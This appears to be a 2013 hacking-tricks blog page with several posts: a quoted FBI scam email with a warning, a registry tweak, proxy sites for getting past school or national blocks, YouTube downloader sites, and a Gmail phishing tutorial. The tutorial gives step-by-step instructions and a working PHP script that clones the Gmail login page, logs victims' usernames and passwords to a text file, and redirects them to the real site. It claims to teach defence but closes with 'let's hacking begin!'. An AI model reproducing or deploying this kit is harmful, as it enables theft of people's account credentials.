Thursday, 7 March 2013

Beware of this F.B.I. Spam mail || Don’t Make Yourself a Prey to this scam


I got an email this afternoon trying to snatch my information via a reply. Before you respond to this email remember,
1. FBI never try to get down to earth for a guy like your or me
2. FBI doesn’t need any funds from individual people.
Thanks to Gmail for recognizing this before I could open this. So I WARN YOU DON’T RESPOND to this one if you got it.
This is the mail I got. Let’s take a look!

ANTI-TERRORIST AND MONETARY CRIMES DIVISION
FBI HEADQUARTERS WASHINGTON DC
FEDERAL BUREAU OF INVESTIGATIONS J.EDGAR HOOVER BUILDING
935 PENNSYLVANIA AVENUE, NW WASHINGTON, D.C. 20535-0001
Ref: FBI/DC/25/113/13/2012
Your attention is needed immediately
  We have been informed through our global intelligence monitoring network that the sum of $10.500, 000.00, has been released from a bank in Africa bearing your name as the beneficiary without dist certificate to clear your name and fund from every terrorist or drug or money laundering activities
We sincerely apologize for sending you this sensitive information via e-mail instead of a certified mail, phone call or a  face-to-face conversation,We will also send you a certified email later it is due to the urgency and importance of the security information needed. To checkmate financial recklessness, illegal gambling, racketeering and considering the effect of the global financial crisis rocking the United States, our government with the help of the Federal Bureau of Investigation (F.B.I) Washington, DC and the internet crime complaint center (ic3),alongside the CIA  signed an agreement with U.K  police for an immediate release of all overdue funds presently logged in their treasury and to ensure it is disbursed to the rightful beneficiaries in all parts of the world. If you the beneficiary would adhere to our instruction it will help you receive your payment  immediately

How To Remove Recycle bin From Your Desktop


Excited on hearing the removal of recycle bin from your desktop? You should be, because the trick I’m going to tell you need a little advanced knowledge of the computers. If you think you can dare to try yourself being a novice, I appreciate your learning spirit. Just follow as I told.
Warning: Backup your registry before you do this trick.
Instructions:
1. Click the start button and open Run.
2. Then type ‘regedit’ and click Enter.
3. Go to the HKEY_LOCAL_MACHINE > SOFTWARE > Microsoft > Windows > Current Version, then Explorer > Desktop.
4. Find the Following Key: 645FF040-5081-101B-9F08-00AA002F954E
5. Delete that key and close the registry editor. Now refresh your desktop. Your icon for the recycling bin should disappear.
Now you have done something geeky! That’s amazing!
Subscribe to us for more such tricks!

Hack Gmail Password with PHP Phishing Attack


Phishing is the process of stealing sensitive information, such as usernames, passwords, and bank information, by pretending to be someone you’re not. An example of this would be if you receive and e-mail from a hacker pretending to be your bank. In this e-mail, it might tell you that you need to update your account before it expires, and then the hacker provides a link. Once you click on the link, you arrive at a website that looks exactly like your actual bank page. In reality it’s just a perfect replica, and when you input your login details, it sends it to the hackers email or stores it on his web server. Hackers that create the best, most deceiving phishing web pages are knowledgeable in the area of HTML and the PHP programming.
Below I will show a simple example of some of the steps a hacker might take to create a phishing website. By seeing the steps a hacker would take, will help you defend against such an attack.
1. First the hacker chooses a target. The most popular targets for phishing attacks are e-mail services such as Hotmail and Gmail because they are the most common and once a hacker gets access to your e-mail, he also gets access to a load of other user information for all the other websites you use. In this example we will pretend the hacker chose Gmail as his target.

2. After choosing his target, the hacker will go to the website and save the whole main page. I use Mozilla Firefox ,(highly recommend using this browser for its security and customization.) So I would go to www.gmail.com and click File -> Save page as… , or simply hit <CTR> + S which does this automatically. Choose where you would like to save the web page and hit Save.
image
image
3. Once you have it saved, rename ServiceLogin.htm to index.htm. The reason you want to name it “index” is so when you upload it to a web host and someone goes to your link, the index page is the first page that shows up.

4. Next the hacker would create a PHP script to do his dirty deed of steeling your information. Below is a simple PHP script that logs and stores your login details when you click “Sign in”. To see how it works, copy and paste the following code into notepad. Next save it into the same directory as you saved the Gmail page, and name it phish.php. In addition to the phish.php page, create a new empty text file and name it list.txt.

<?php // This marks the beginning of the PHP script.
Header(“Location: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy&ltmpl=default&ltmplcache=2 “); // once you click “Sign in” in the fake website, this redirects you to the real Gmail website, making the whole process look more legit.
$handle = fopen(“list.txt”, “a”); // this tells the server to open the file “list.txt” and get it ready for appending data. Which in this case is your username and password.
Foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
} // This section simply assigns all the information going through this form to a variable. This includes your username and password.
Fwrite($handle, “\r\n”); // This writes your details to the file “list.txt”
fclose($handle); // This simply closes the connection to the file “list.txt”
exit;
?> // Marks the end of the PHP program.



So far you should see the following in your folder:


image


5. Now the hacker would have to edit the main Gmail page to include his PHP script. To see what the hacker would do, open up the main Gmail page named index.htm with notepad.


6. Hit <CTR> + F , or go to Edit -> Find , type in action and hit “Find Next”.


image


7. This will highlight the first occurrence of the word “action” in the script and you should see the following:


image


There are two “action” occurrences in the script so make sure you have the right one by looking at the “form id” name above. Change the link between action = “ “ to phish.php . This will make the form submit to your PHP phish script instead of to Google. After the link you will see the code:


image


Change the word “POST” to “GET” so that it looks like method=”GET”. What the GET method does is submit the information you type in through the URL so that the PHP script can log it.


8. Save and close the file.


9. Next the hacker would upload the files up to a free webhost that supports PHP. With a simple Google search you can come up with a bunch that fall under this category.


10. Once all the files are uploaded, you must give writing permissions to the “list.txt” file. Every hosting company should have a CHMOD option next to each file. Select this option and change the file permission for “list.txt” to 777. If you can’t figure out how to do this, ask people that use the same host or simply Google something similar to: “yourwebhostname chmod”.


11. Once everything is up and ready to go, go to the link your host provided you for your website and you should see the Gmail page replica. Type in a username/password and click Sign in. This should have redirected you to the real Gmail page.


12. Now go take a look at your list.txt file by going through your hosting file manager or going to http://www.yourwebhosturl.com/youraccount/list.txt. Although this is the most common, the web host you use may provide a different looking URL. Now if I put a username of “myusername” and a password of “mypassword” then “list.txt” would now look like the following:




image


13. Say after me let’s hacking begin!

Friday, 1 March 2013

HOW TO CHECK DND(Do Not Disturb) SERVICE STATUS ONLINE IN INDIA



DND is short for Do Not Disturb. This service enables the mobile users to stop receiving advertising or bulk sms or calls on their mobile. This service is provided by NDNC (National Do Not Call Registry). So if you want to check your number is registered on DND or not then here are some steps , just follow them.

STEP 1.
First of all open this website, and click on Check Registration Status.


COLLECTION OF PROXY SITES FOR BROWSING BANNED SITES

Hey friends, hi to all of you. As there are many websites that are blocked in your school/college or even in your country. If you want to open those websites, you will
need to use a proxy website. A proxy is something that hides your real information and tells the server that you are allowed to view website. Here goes the list:

Hey friends, hi to all of you. As there are many websites that are blocked in your school/college or even in your country. If you want to open those websites, you will
need to use a proxy website. A proxy is something that hides your real information and tells the server that you are allowed to view website. Here goes the list:

Rest sites are given below:
How to use? Just enter the URL you want to open and hit Enter. It will open up the sites you want.
HAVE A TRICKY DAY!!!

Top 10 websites to download YouTube videos

Hi friends , you know that YouTube do not allow the users to download videos from it. But when user like the video and want to download it on its device then he try to find some softwares or websites to download YouTube videos so today I decided to help those users to download YouTube videos. I have made a simple collection of Top 10 websites to download YouTube videos, So have a look at them , I hope this list will be useful for you and you'll like this.



1. Keep-Tube.Com


2. Savevid.com


3. Savemedia.com


4. Keepvid.com


5. Videodownloadx.com










6. Catchvideo.net


7. Savetube.com


8. Linkyoutube.com


9. Youtubeinmp4.com


10. Clipconverter.cc




[NOTE:- You can use these website to download YouTube videos only from PC browser, because Mobile browsers like OperaMini , UC web do not have Java inbuilt so you can not download YouTube video from mobile using these websites]

" ENJOY & WAIT FOR NEXT "

HOW TO POST TWITTER UPDATE AUTOMATICALLY ON FACEBOOK

Hey friends, hi to all of you. Facebook is the first thing you think when it comes to social networking. But, lots of people use Twitter too. We have a idea : Why not post your twitter updates
directly on your Facebook wall? That`s cool ! Right....Here`s how you can do it:

  • Login to your Twitter account. 
  • Now, scroll down and click Connect to Facebook
  • A pop up will come up, login with your Facebook and click on Allow
  • It is done. Now, whenever you post from twitter, it is posted to Facebook too.